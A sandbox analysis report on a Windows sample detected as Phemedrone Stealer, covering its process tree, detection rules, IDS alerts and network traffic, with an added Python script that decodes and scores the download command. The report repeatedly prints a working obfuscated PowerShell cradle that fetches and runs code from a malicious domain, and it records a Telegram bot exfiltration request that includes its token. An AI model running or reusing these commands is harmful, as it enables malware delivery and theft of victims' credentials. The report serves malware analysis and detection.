
Windows Analysis Report
DBp7mBJwqD.exe

Overview

General Information

Sample name: DBp7mBJwqD.exe (renamed because the original name is a hash value)
Original sample name: 86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe
Analysis ID: 1548278
MD5: c5d36c7404a03ec6df8024737d97a0c8
SHA1: 9a213e487337376c38e0cfdac240dc6ffb5fdc1e
SHA256: 86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354
Tags: apitradingview-com, exe, user-JAMESWT_MHT

Detection

Phemedrone Stealer
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • DBp7mBJwqD.exe (PID: 7808 cmdline: "C:\Users\user\Desktop\DBp7mBJwqD.exe" MD5: C5D36C7404A03EC6DF8024737D97A0C8)
    • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7908 cmdline: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7956 cmdline: cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • cmd.exe (PID: 7972 cmdline: cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8016 cmdline: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • WmiPrvSE.exe (PID: 2132 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • WDSecureUtilities_548.exe (PID: 3432 cmdline: "C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe" -pkek -aoa -y MD5: BCB323EB0CFD10D58CF134BC7BDC8D67)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security
0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GenericStealer_9 | Yara detected Generic Stealer | Joe Security
0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security
0000000A.00000002.1515907713.000002545EC7A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security
0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security
(4 further entries not shown)

Source | Rule | Description | Author | Strings
amsi64_8016.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x165:$b3: ::UTF8.GetString(
  • 0xb9c7:$s1: -join
  • 0x5173:$s4: +=
  • 0x5235:$s4: +=
  • 0x945c:$s4: +=
  • 0xb579:$s4: +=
  • 0xb863:$s4: +=
  • 0xb9a9:$s4: +=
  • 0x658ad:$s4: +=
  • 0x6592d:$s4: +=
  • 0x659f3:$s4: +=
  • 0x65a73:$s4: +=
  • 0x65c49:$s4: +=
  • 0x65ccd:$s4: +=
  • 0xc0a0:$e4: Start-Process
  • 0xc1a8:$e4: Get-Process
  • 0x6644b:$e4: Get-WmiObject
  • 0x6663a:$e4: Get-Process
  • 0x66692:$e4: Start-Process

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", CommandLine: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\DBp7mBJwqD.exe", ParentImage: C:\Users\user\Desktop\DBp7mBJwqD.exe, ParentProcessId: 7808, ParentProcessName: DBp7mBJwqD.exe, ProcessCommandLine: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", ProcessId: 7908, ProcessName: cmd.exe
Source: Process started | Author: frack113 | Data: Command: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", CommandLine: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7972, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", ProcessId: 8016, ProcessName: powershell.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8016, TargetFilename: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", CommandLine: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\DBp7mBJwqD.exe", ParentImage: C:\Users\user\Desktop\DBp7mBJwqD.exe, ParentProcessId: 7808, ParentProcessName: DBp7mBJwqD.exe, ProcessCommandLine: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", ProcessId: 7908, ProcessName: cmd.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", CommandLine: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\DBp7mBJwqD.exe", ParentImage: C:\Users\user\Desktop\DBp7mBJwqD.exe, ParentProcessId: 7808, ParentProcessName: DBp7mBJwqD.exe, ProcessCommandLine: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", ProcessId: 7908, ProcessName: cmd.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", CommandLine: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7972, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", ProcessId: 8016, ProcessName: powershell.exe
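The nested cmd.exe > cmd.exe > cmd.exe > powershell.exe chain in the process tree and the Sigma matches listed above all hinge on one download cradle: the staging URL is split into five single-quoted fragments ($AI, $mode, $update, $dev, $beta) and joined at run time, so the string apitradingview.com never appears literally in any command line, while -NoP -NonI -ExecutionPolicy Bypass, a spoofed 'TradingView' user agent and a final IEX do the work. As an added example (not part of the Joe Sandbox report and not the sample's own code), the following Python resolves that concatenation statically and scores a command line for cradle indicators. The first command line is copied from the report's entry for PID 8016; the benign comparison command and the indicator names are my own.

```python
import re

# Constructed input: the PowerShell command line the report records for PID 8016.
SAMPLE_CMDLINE = (
    "powershell -NoP -NonI -ExecutionPolicy Bypass -Command \""
    "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; "
    "$beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; "
    "$Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; "
    "$Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script\""
)
# Constructed benign command line, to show the classifier does not fire on ordinary use.
BENIGN_CMDLINE = 'powershell -NoProfile -Command "Get-Process | Sort-Object CPU -Descending"'

# $name = 'literal' | $var [+ 'literal' | $var ...] ;   (only this shape is evaluated)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*((?:\$\w+|'[^']*')(?:\s*\+\s*(?:\$\w+|'[^']*'))*)\s*;")
TERM_RE = re.compile(r"\$(\w+)|'([^']*)'")


def resolve_strings(cmdline: str) -> dict:
    """Statically evaluate single-quoted string assignments and '+' concatenation in
    order, so $charts=$AI+$mode+$update+$dev+$beta collapses to its final value.
    Nothing is executed; assignments of any other shape are ignored."""
    env = {}
    for name, expr in ASSIGN_RE.findall(cmdline):
        parts = []
        for var, literal in TERM_RE.findall(expr):
            # Unknown variables are left symbolic rather than silently dropped.
            parts.append(env.get(var, "$" + var) if var else literal)
        env[name] = "".join(parts)
    return env


def analyze_cradle(cmdline: str) -> dict:
    """Recover the fetched URL and user agent and score download-cradle indicators."""
    env = resolve_strings(cmdline)
    uri = re.search(r"-Uri\s+\$(\w+)", cmdline, re.I)
    ua = re.search(r"-UserAgent\s+\$(\w+)", cmdline, re.I)
    # Number of '+' terms in the longest concatenation; 1 means no concatenation at all.
    concat_terms = max(
        (expr.count("+") + 1 for _, expr in ASSIGN_RE.findall(cmdline)), default=0
    )
    indicators = {
        "execution_policy_bypass": bool(re.search(r"-E\w*\s+Bypass", cmdline, re.I)),
        "quiet_console_flags": bool(re.search(r"-NoP\w*|-NonI\w*|-W\w*\s+Hidden", cmdline, re.I)),
        "web_request": bool(re.search(
            r"Invoke-WebRequest|Invoke-RestMethod|\biwr\b|DownloadString|DownloadFile|WebClient",
            cmdline, re.I)),
        "inline_execution": bool(re.search(r"\bIEX\b|Invoke-Expression", cmdline, re.I)),
        "string_concat_obfuscation": concat_terms >= 3,
        "custom_user_agent": bool(ua),
    }
    return {
        "url": env.get(uri.group(1)) if uri else None,
        "user_agent": env.get(ua.group(1)) if ua else None,
        "indicators": indicators,
        # A cradle needs both a fetch and an in-memory execution step; the other
        # indicators only raise confidence (and explain a lone -NoProfile on a dev box).
        "is_download_cradle": indicators["web_request"] and indicators["inline_execution"],
        "score": sum(indicators.values()),
    }


if __name__ == "__main__":
    for cmd in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        print(analyze_cradle(cmd))
```

Run against the report's command line this yields url https://apitradingview.com/ermando1.txt (the same URL Avira later labels as malware) and user_agent TradingView, with all six indicators set; the benign command trips only quiet_console_flags and is not classified as a cradle. The same resolution step is what you would apply to a 4104 script-block log or an AMSI buffer before matching Sigma rules that key on literal URLs.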
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-04T09:39:04.720276+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.11 | 49774 | TCP
2024-11-04T09:39:43.048659+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.11 | 49981 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-04T09:38:56.060215+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49733 | 86.104.15.60 | 443 | TCP


AV Detection

Source: https://apitradingview.com | Avira URL Cloud: Label: malware
Source: https://apitradingview.com/WDSecureUtilities.exe | Avira URL Cloud: Label: malware
Source: http://apitradingview.com | Avira URL Cloud: Label: malware
Source: https://apitradingview.com/ermando1.txt | Avira URL Cloud: Label: malware
Source: :newads (copy) | ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | ReversingLabs: Detection: 78%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 95.4% probability
Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 86.104.15.60:443 -> 192.168.2.11:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.11:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49795 version: TLS 1.2
Source: DBp7mBJwqD.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1 | Host: get.geojs.io | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 172.67.70.233
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49733 -> 86.104.15.60:443
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.11:49774
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.11:49981
Source: global traffic | HTTP traffic detected: GET /WDSecureUtilities.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: apitradingview.com
Source: global traffic | HTTP traffic detected: POST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600 | Content-Type: multipart/form-data; boundary=----------------------------8dcfc823ae7a7a0 | Host: api.telegram.org | Content-Length: 723700 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /ermando1.txt HTTP/1.1 | User-Agent: TradingView | Host: apitradingview.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /WDSecureUtilities.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: apitradingview.com
Source: global traffic | HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1 | Host: get.geojs.io | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: apitradingview.com
Source: global traffic | DNS traffic detected: DNS query: get.geojs.io
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600 | Content-Type: multipart/form-data; boundary=----------------------------8dcfc823ae7a7a0 | Host: api.telegram.org | Content-Length: 723700 | Expect: 100-continue | Connection: Keep-Alive
Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 00000008.00000002.1582598087.0000019256A19000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://apitradingview.com
Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EA37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://get.geojs.io
Source: powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1582598087.0000019255F29000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.1582598087.0000019255B71000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1582598087.0000019255F29000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1582598087.0000019255B71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.tele
Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument
Source: powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1582598087.0000019256A19000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apitradingview.com
Source: powershell.exe, 00000008.00000002.1582598087.0000019255F29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1582598087.0000019255F25000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apitradingview.com/WDSecureUtilities.exe
Source: powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apitradingview.com/ermando1.txt
Source: powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geojs.io
